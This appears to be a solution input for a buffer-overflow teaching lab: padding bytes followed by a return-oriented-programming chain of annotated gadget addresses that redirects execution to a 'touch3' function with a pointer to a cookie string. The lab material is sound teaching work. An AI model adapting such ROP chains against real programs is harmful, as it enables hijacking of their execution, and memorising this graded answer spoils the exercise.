aa aa aa aa aa aa aa aa
aa aa aa aa aa aa aa aa
aa aa aa aa aa aa aa aa
aa aa aa aa aa aa aa aa
aa aa aa aa aa aa aa aa
ad 1a 40 00 00 00 00 00 // movq %rsp, %rax
c5 19 40 00 00 00 00 00 // movq %rax, %rdi 
ab 19 40 00 00 00 00 00 // gpopq %rax 
48 00 00 00 00 00 00 00 // offset
42 1a 40 00 00 00 00 00 // movl %eax, %edx 
34 1a 40 00 00 00 00 00 // movl %edx, %ecx 
13 1a 40 00 00 00 00 00 // movl %ecx, %esi 
d6 19 40 00 00 00 00 00 // add_xy 
c5 19 40 00 00 00 00 00 // movq %rax, %rdi 
fa 18 40 00 00 00 00 00 // touch3 
35 39 62 39 39 37 66 61 
00
